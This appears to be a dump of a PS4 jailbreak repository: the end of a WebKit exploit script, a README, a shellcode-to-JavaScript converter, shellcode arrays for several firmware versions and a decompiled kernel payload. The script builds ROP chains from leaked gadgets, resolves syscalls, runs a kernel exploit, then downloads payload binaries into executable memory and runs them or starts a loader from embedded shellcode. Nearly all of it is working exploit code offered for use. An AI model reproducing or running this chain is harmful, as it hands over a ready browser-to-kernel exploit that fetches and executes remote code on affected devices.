342 | 							if (gadgetbytes[compareidx] != wkview[i - compareidx]) {
343 | 								found = 0;
344 | 								break;
345 | 							}
346 | 						}
347 | 						if (!found)
348 | 							continue;
349 | 						gadgets[gadgetnames[nl]] = o2wk(i - gadgetbytes.length + 1);
350 | 						gadgetoffs[gadgetnames[nl]] = i - gadgetbytes.length + 1;
351 | 						delete gadgetnames[nl];
352 | 						gadgets_to_find--;
353 | 					}
354 | 				} else if (wkview[i] == 0xe0 && wkview[i - 1] == 0xff && slowpath_jop) {
355 | 					var found = 1;
356 | 					for (var compareidx = 0; compareidx < slowpath_jop.length; compareidx++) {
357 | 						if (slowpath_jop[compareidx] != wkview[i - compareidx]) {
358 | 							found = 0;
359 | 							break;
360 | 						}
361 | 					}
362 | 					if (!found)
363 | 						continue;
364 | 					gadgets["jop"] = o2wk(i - slowpath_jop.length + 1);
365 | 					gadgetoffs["jop"] = i - slowpath_jop.length + 1;
366 | 					gadgets_to_find--;
367 | 					slowpath_jop = 0;
368 | 				}
369 | 
370 | 				if (!gadgets_to_find)
371 | 					break;
372 | 			}
373 | 		}
374 | 		if (!gadgets_to_find && !slowpath_jop)
375 | 			setTimeout(donecb, 50);
376 | 		else {
377 | 			print("missing gadgets: ");
378 | 			for (var nl in gadgetnames)
379 | 				print(" - " + gadgetnames[nl]);
380 | 			if (slowpath_jop)
381 | 				print(" - jop gadget");
382 | 		}
383 | 	}
384 | 
385 | 	findgadget(function () { });
386 | 	var hold1;
387 | 	var hold2;
388 | 	var holdz;
389 | 	var holdz1;
390 | 
391 | 	while (1) {
392 | 		hold1 = { a: 0, b: 0, c: 0, d: 0 };
393 | 		hold2 = { a: 0, b: 0, c: 0, d: 0 };
394 | 		holdz1 = p.leakval(hold2);
395 | 		holdz = p.leakval(hold1);
396 | 		if (holdz.low - 0x30 == holdz1.low) break;
397 | 	}
398 | 
399 | 	var pushframe = [];
400 | 	pushframe.length = 0x80;
401 | 	var funcbuf;
402 | 	var funcbuf32 = new Uint32Array(0x100);
403 | 	nogc.push(funcbuf32);
404 | 
405 | 	var launch_chain = function (chain) {
406 | 		var stackPointer = 0;
407 | 		var stackCookie = 0;
408 | 		var orig_reenter_rip = 0;
409 | 
410 | 		var reenter_help = {
411 | 			length: {
412 | 				valueOf: function () {
413 | 					orig_reenter_rip = p.read8(stackPointer);
414 | 					stackCookie = p.read8(stackPointer.add32(8));
415 | 					var returnToFrame = stackPointer;
416 | 
417 | 					var ocnt = chain.count;
418 | 					chain.push_write8(stackPointer, orig_reenter_rip);
419 | 					chain.push_write8(stackPointer.add32(8), stackCookie);
420 | 
421 | 					if (chain.runtime) returnToFrame = chain.runtime(stackPointer);
422 | 
423 | 					chain.push(gadgets["pop rsp"]);
424 | 					chain.push(returnToFrame); // -> back to the trap life
425 | 					chain.count = ocnt;
426 | 
427 | 					p.write8(stackPointer, (gadgets["pop rsp"])); // pop pop
428 | 					p.write8(stackPointer.add32(8), chain.stackBase); // rop rop
429 | 				}
430 | 			}
431 | 		};
432 | 		
433 | 		funcbuf = p.read8(p.leakval(funcbuf32).add32(0x10));
434 | 
435 | 		p.write8(funcbuf.add32(0x30), gadgets["setjmp"]);
436 | 		p.write8(funcbuf.add32(0x80), gadgets["jop"]);
437 | 		p.write8(funcbuf, funcbuf);
438 | 		p.write8(parseFloatStore, gadgets["jop"]);
439 | 		var orig_hold = p.read8(holdz1);
440 | 		var orig_hold48 = p.read8(holdz1.add32(0x48));
441 | 
442 | 		p.write8(holdz1, funcbuf.add32(0x50));
443 | 		p.write8(holdz1.add32(0x48), funcbuf);
444 | 		parseFloat(hold2, hold2, hold2, hold2, hold2, hold2);
445 | 		p.write8(holdz1, orig_hold);
446 | 		p.write8(holdz1.add32(0x48), orig_hold48);
447 | 
448 | 		stackPointer = p.read8(funcbuf.add32(0x10));
449 | 		rtv = Array.prototype.splice.apply(reenter_help);
450 | 		return p.leakval(rtv);
451 | 	}
452 | 
453 | 	gadgets = gadgets;
454 | 	p.loadchain = launch_chain;
455 | 
456 | 	function swapkeyval(json) {
457 | 		var ret = {};
458 | 		for (var key in json) {
459 | 			if (json.hasOwnProperty(key))
460 | 				ret[json[key]] = key;
461 | 		}
462 | 		return ret;
463 | 	}
464 | 
465 | 	var kview = new Uint8Array(0x1000);
466 | 	var kstr = p.leakval(kview).add32(0x10);
467 | 	var orig_kview_buf = p.read8(kstr);
468 | 
469 | 	p.write8(kstr, window.libKernelBase);
470 | 	p.write4(kstr.add32(8), 0x40000);
471 | 
472 | 	var countbytes;
473 | 	for (var i = 0; i < 0x40000; i++) {
474 | 		if (kview[i] == 0x72 && kview[i + 1] == 0x64 && kview[i + 2] == 0x6c && kview[i + 3] == 0x6f && kview[i + 4] == 0x63) {
475 | 			countbytes = i;
476 | 			break;
477 | 		}
478 | 	}
479 | 	p.write4(kstr.add32(8), countbytes + 32);
480 | 
481 | 	var dview32 = new Uint32Array(1);
482 | 	var dview8 = new Uint8Array(dview32.buffer);
483 | 	for (var i = 0; i < countbytes; i++) {
484 | 		if (kview[i] == 0x48 && kview[i + 1] == 0xc7 && kview[i + 2] == 0xc0 && kview[i + 7] == 0x49 && kview[i + 8] == 0x89 && kview[i + 9] == 0xca && kview[i + 10] == 0x0f && kview[i + 11] == 0x05) {
485 | 			dview8[0] = kview[i + 3];
486 | 			dview8[1] = kview[i + 4];
487 | 			dview8[2] = kview[i + 5];
488 | 			dview8[3] = kview[i + 6];
489 | 			var syscallno = dview32[0];
490 | 			window.syscalls[syscallno] = window.libKernelBase.add32(i);
491 | 		}
492 | 	}
493 | 
494 | 	var chain = new window.rop;
495 | 	var returnvalue;
496 | 
497 | 	p.fcall_ = function (rip, rdi, rsi, rdx, rcx, r8, r9) {
498 | 		chain.clear();
499 | 
500 | 		chain.notimes = this.next_notime;
501 | 		this.next_notime = 1;
502 | 
503 | 		chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);
504 | 
505 | 		chain.push(window.gadgets["pop rdi"]);
506 | 		chain.push(chain.stackBase.add32(0x3ff8));
507 | 		chain.push(window.gadgets["mov [rdi], rax"]);
508 | 
509 | 		chain.push(window.gadgets["pop rax"]);
510 | 		chain.push(p.leakval(0x41414242));
511 | 
512 | 		if (chain.run().low != 0x41414242)
513 | 			throw new Error("unexpected rop behaviour");
514 | 		returnvalue = p.read8(chain.stackBase.add32(0x3ff8));
515 | 	}
516 | 
517 | 	p.fcall = function () {
518 | 		var rv = p.fcall_.apply(this, arguments);
519 | 		return returnvalue;
520 | 	}
521 | 
522 | 	p.readstr = function (addr) {
523 | 		var addr_ = addr.add32(0);
524 | 		var rd = p.read4(addr_);
525 | 		var buf = "";
526 | 		while (rd & 0xFF) {
527 | 			buf += String.fromCharCode(rd & 0xFF);
528 | 			addr_.add32inplace(1);
529 | 			rd = p.read4(addr_);
530 | 		}
531 | 		return buf;
532 | 	}
533 | 
534 | 	p.syscall = function (sysc, rdi, rsi, rdx, rcx, r8, r9) {
535 | 		if (typeof sysc == "string")
536 | 			sysc = window.syscallnames[sysc];
537 | 			
538 | 		if (typeof sysc != "number")
539 | 			throw new Error("invalid syscall");
540 | 
541 | 		var off = window.syscalls[sysc];
542 | 		if (off == undefined)
543 | 			throw new Error("invalid syscall");
544 | 
545 | 		return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9);
546 | 	}
547 | 
548 | 	p.stringify = function (str) {
549 | 		var bufView = new Uint8Array(str.length + 1);
550 | 		for (var i = 0; i < str.length; i++)
551 | 			bufView[i] = str.charCodeAt(i) & 0xFF;
552 | 		window.nogc.push(bufView);
553 | 		return p.read8(p.leakval(bufView).add32(0x10));
554 | 	};
555 | 
556 | 	p.malloc = function malloc(sz) {
557 | 		var backing = new Uint8Array(0x10000 + sz);
558 | 		window.nogc.push(backing);
559 | 		var ptr = p.read8(p.leakval(backing).add32(0x10));
560 | 		ptr.backing = backing;
561 | 		return ptr;
562 | 	}
563 | 
564 | 	p.malloc32 = function malloc32(sz) {
565 | 		var backing = new Uint8Array(0x10000 + sz * 4);
566 | 		window.nogc.push(backing);
567 | 		var ptr = p.read8(p.leakval(backing).add32(0x10));
568 | 		ptr.backing = new Uint32Array(backing.buffer);
569 | 		return ptr;
570 | 	}
571 | 
572 | 	function runPayload(path) {
573 | 		var req = new XMLHttpRequest();
574 | 		req.open('GET', path);
575 | 		req.responseType = "arraybuffer";
576 | 		req.send();
577 | 		req.onreadystatechange = function () {
578 | 			if (req.readyState === 4) {
579 | 				try {
580 | 					var code_addr = new int64(0x26100000, 0x00000009);
581 | 					var mapped_address = p.syscall("sys_mmap", code_addr, 0x300000, 7, 0x41000, -1, 0);
582 | 					if (mapped_address != '926100000')
583 | 						throw "sys_mmap failed";
584 | 					var shellcode = new Uint32Array(req.response);
585 | 					for (var i=0; i < shellcode.length; i++)
586 | 						p.write4(code_addr.add32(0x100000 + i * 4), shellcode[i]);
587 | 					p.fcall(code_addr);
588 | 					// Free memory
589 | 					for (var i = 0; i < 0x300000; i += 8)
590 | 						p.write8(code_addr.add32(i), 0);
591 | 				} catch (e) {
592 | 					alert("exception: " + e);
593 | 				}
594 | 			}
595 | 		}
596 | 	}
597 | 	
598 | 	//alert("Launching kexploit");
599 | 	
600 | 	// Test if the kernel is already patched
601 | 	if (p.syscall("sys_setuid", 0) != '0')
602 | 		while (!kernExploit()) {}
603 | 	// Kernel patched, launch cool stuff
604 | 	
605 | 	// Check mira status
606 | 	var testMira = p.syscall("sys_setlogin", p.stringify("root"));
607 | 	if (fwFromUA == "5.05") {
608 | 		//runPayload("kdumper.bin");
609 | 		runPayload("ps4-hen-vtx-505.bin");
610 | 		//runPayload("unblocker.bin");
611 | 		
612 | 		/*
613 | 		sleep(2000);
614 | 		runPayload("mira_505.bin");
615 | 		sleep(2000);
616 | 		// Test if payloads ran successfully, if not, refresh
617 | 		testMira = p.syscall("sys_setlogin", p.stringify("root"));
618 | 		if (testMira != '0') {
619 | 			alert("Mira failed to run !");
620 | 			//location.reload();
621 | 		}
622 | 		*/
623 | 		
624 | 		// All done all done!
625 | 		allset();
626 | 	} else if (fwFromUA == "4.74") {
627 | 		//runPayload("kdumper.bin");
628 | 		runPayload("fake_installer.bin");
629 | 		
630 | 		// All done all done!
631 | 		allset();
632 | 	} else if (fwFromUA == "4.55") {
633 | 		runPayload("ps4-hen-vtx-455.bin");
634 | 		//runPayload("unblocker.bin");
635 | 		
636 | 		// All done all done!
637 | 		allset();
638 | 	} else {
639 | 		// Load payload launcher
640 | 		var code_addr = new int64(0x26100000, 0x00000009);
641 | 		var mapped_address = p.syscall("sys_mmap", code_addr, 0x300000, 7, 0x41000, -1, 0);
642 | 		if (mapped_address == '926100000') {
643 | 			try {
644 | 				var shcode = [0x31fe8948, 0x3d8b48c0, 0x00003ff4, 0xed0d8b48, 0x4800003f, 0xaaf3f929, 0xe8f78948, 0x00000060, 0x48c3c031, 0x0003c0c7, 0x89490000, 0xc3050fca, 0x06c0c748, 0x49000000, 0x050fca89, 0xc0c748c3, 0x0000001e, 0x0fca8949, 0xc748c305, 0x000061c0, 0xca894900, 0x48c3050f, 0x0068c0c7, 0x89490000, 0xc3050fca, 0x6ac0c748, 0x49000000, 0x050fca89, 0x909090c3, 0x90909090, 0x90909090, 0x90909090, 0xb8555441, 0x00003c23, 0xbed23153, 0x00000001, 0x000002bf, 0xec834800, 0x2404c610, 0x2444c610, 0x44c70201, 0x00000424, 0x89660000, 0xc6022444, 0x00082444, 0x092444c6, 0x2444c600, 0x44c6000a, 0xc6000b24, 0x000c2444, 0x0d2444c6, 0xff78e800, 0x10baffff, 0x41000000, 0x8948c489, 0xe8c789e6, 0xffffff73, 0x00000abe, 0xe7894400, 0xffff73e8, 0x31d231ff, 0xe78944f6, 0xffff40e8, 0x48c589ff, 0x200000b8, 0x00000926, 0xc300c600, 0xebc38948, 0x801f0f0c, 0x00000000, 0x01489848, 0x1000bac3, 0x89480000, 0xe8ef89de, 0xfffffef7, 0xe87fc085, 0xe8e78944, 0xfffffef8, 0xf1e8ef89, 0x48fffffe, 0x200000b8, 0x00000926, 0x48d0ff00, 0x5b10c483, 0xc35c415d, 0xc3c3c3c3];
645 | 				var shellbuf = p.malloc32(0x1000);
646 | 				for (var i = 0; i < shcode.length; i++)
647 | 					shellbuf.backing[i] = shcode[i];
648 | 				p.syscall("sys_mprotect", shellbuf, 0x4000, 7);
649 | 				// Launch loader
650 | 				p.fcall(window.gadgets["createThread"], shellbuf, 0, p.stringify("loader"));
651 | 			} catch (e) { alert(e); }
652 | 		}
653 | 		
654 | 		// Awaiting payload message
655 | 		awaitpl();
656 | 	}
657 | }


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # PS4-Exploits
 2 | All you need to exploit your PS4 on almost all FWs below 5.07
 3 | 
 4 | ## QuickHEN
 5 | An all-in-one playground for PS4 on 4.55-5.07.
 6 | 
 7 | ### Description
 8 | 
 9 | Supports 4.55, 4.74, 5.01, 5.05 and 5.07.
10 | 
11 | ### Usage
12 | 
13 | Host these files on a server and access index.html on a PS4.
14 | 
15 | ### Credits
16 | 
17 | * qwertyoruiopz
18 | * Specter
19 | * CelesteBlue
20 | * to be continued
21 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode2js/bin/shellcode2js.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode2js/bin/shellcode2js.exe


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode2js/src/Makefile:
--------------------------------------------------------------------------------
 1 | CC=gcc
 2 | CFLAGS=
 3 | LDFLAGS=
 4 | SOURCES=main.c
 5 | EXECUTABLE=shellcode2js
 6 | 
 7 | all:
 8 | 	$(CC) $(CFLAGS) $(SOURCES) $(LDFLAGS) -o $(EXECUTABLE)
 9 | 	
10 | clean:
11 | 	rm -rf $(EXECUTABLE)


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode2js/src/main.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdint.h>
 3 | #include <stdlib.h>
 4 | #include <string.h>
 5 | 
 6 | int main(int argc, char** argv) {
 7 | 	FILE *input = NULL, *output = NULL;
 8 | 	char outpath[256];
 9 | 	
10 | 	if (argc != 3)
11 | 		if (argc != 2)
12 | 			return 0;
13 | 		else
14 | 			snprintf(outpath, 256, "%s.js", argv[1]);
15 | 	else
16 | 		snprintf(outpath, 256, "%s", argv[2]);
17 | 	
18 | 	input = fopen(argv[1], "rb");
19 | 	output = fopen(outpath, "wb");
20 | 	if (!input || !output)
21 | 		fprintf(stderr, "could not open file");
22 | 	
23 | 	fseek(input, 0, SEEK_END);
24 | 	unsigned long size = ftell(input);
25 | 	fseek(input, 0, SEEK_SET);
26 | 
27 | 	uint32_t* buffer = (uint32_t *)malloc(size);
28 | 	fread(buffer, 1, size, input);
29 | 	fclose(input);
30 | 	char text[256];
31 | 
32 | 	snprintf(text, 256, "    var shcode = [");
33 | 	fwrite(text, strlen(text), 1, output);
34 | 
35 | 	for (uint32_t i=0; i < size/4; i++) {
36 | 		snprintf(text, 256, "0x%08X, ", buffer[i]);
37 | 		fwrite(text, strlen(text), 1, output);
38 | 	}
39 | 	
40 | 	snprintf(text, 256, "];\n");
41 | 	fwrite(text, strlen(text), 1, output);
42 | 	
43 | 	fclose(output);
44 | 	return 0;
45 | }


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_455.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode_455.bin


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_455.bin.js:
--------------------------------------------------------------------------------
1 |     var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x6A302494, 0x8D4DFFCF, 0xE18024B4, 0x8D4D000E, 0xE96024AC, 0x8149FFD0, 0x65A680C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, ];
2 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_474.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode_474.bin


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_474.bin.js:
--------------------------------------------------------------------------------
1 |     var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x48302494, 0x8D4DFFCF, 0xCDF024B4, 0x8D4D000E, 0xC76024AC, 0x8149FFD0, 0x660570C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, ];
2 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_501.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode_501.bin


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_501.bin.js:
--------------------------------------------------------------------------------
1 |     var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xDF8024B4, 0x8D4D0010, 0x5AB024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, ];
2 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_505.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode_505.bin


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_505.bin.js:
--------------------------------------------------------------------------------
1 |     var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xE09024B4, 0x8D4D0010, 0x5E8024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, ];
2 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_505.c:
--------------------------------------------------------------------------------
 1 | /* This file has been generated by the Hex-Rays decompiler.
 2 |    Copyright (c) 2007-2017 Hex-Rays <info@hex-rays.com>
 3 | 
 4 |    Detected compiler: GNU C++
 5 | */
 6 | 
 7 | #include <defs.h>
 8 | 
 9 | 
10 | //-------------------------------------------------------------------------
11 | // Function declarations
12 | 
13 | __int64 j_sycall_11_sub();
14 | __int64 kpayload();
15 | signed __int64 syscall_11_sub();
16 | 
17 | //-------------------------------------------------------------------------
18 | // Data declarations
19 | 
20 | char *aKmalloc0x016lx[] = { (char *)0x3A636F6C6C616D6BLL, (char *)0x6C36313025783020LL };
21 | __int64 qword_D0 = 0LL; // weak
22 | 
23 | 
24 | //----- (0000000000000010) ----------------------------------------------------
25 | __int64 kpayload()
26 | {
27 |   signed __int64 v0; // rcx
28 |   signed int i; // ebx
29 |   unsigned __int64 xfast_syscall; // r12
30 |   signed __int64 kbase; // rdx
31 |   __int64 (__fastcall *malloc)(unsigned __int64, __int64, unsigned int); // r14
32 |   __int64 (__fastcall *printf)(__int64, __int64, __int64, __int64, __int64, __int64, char); // r13
33 |   signed __int64 M_KQUEUE_offset; // r12
34 |   __int64 malloc_res; // rsi
35 | 
36 |   v0 = 0xC0000082LL;
37 |   i = 0x100;
38 |   xfast_syscall = __readmsr(0xC0000082);
39 |   kbase = xfast_syscall - 0x1C0;
40 |   malloc = (__int64 (__fastcall *)(unsigned __int64, __int64, unsigned int))(xfast_syscall + 0x10E090);
41 |   printf = (__int64 (__fastcall *)(__int64, __int64, __int64, __int64, __int64, __int64, char))(xfast_syscall + 0x435E80);
42 |   M_KQUEUE_offset = xfast_syscall + 0x14B7160;
43 |   qword_D0 = kbase;
44 |   do
45 |   {
46 |     malloc_res = ((__int64 (__fastcall *)(signed __int64, signed __int64, signed __int64, signed __int64))malloc)(
47 |                    0x800LL,
48 |                    M_KQUEUE_offset,
49 |                    2LL,
50 |                    v0);
51 |     ((void (__fastcall *)(char **, __int64))printf)(aKmalloc0x016lx, malloc_res);
52 |     --i;
53 |   }
54 |   while ( i );
55 |   return 0LL;
56 | }
57 | // D0: using guessed type __int64 qword_D0;
58 | 
59 | //----- (0000000000000090) ----------------------------------------------------
60 | signed __int64 syscall_11_sub()
61 | {
62 |   signed __int64 result; // rax
63 | 
64 |   result = 11LL;
65 |   __asm { syscall; Low latency system call }
66 |   return result;
67 | }
68 | 
69 | // ALL OK, 2 function(s) have been successfully decompiled
70 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_505.i64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode_505.i64


--------------------------------------------------------------------------------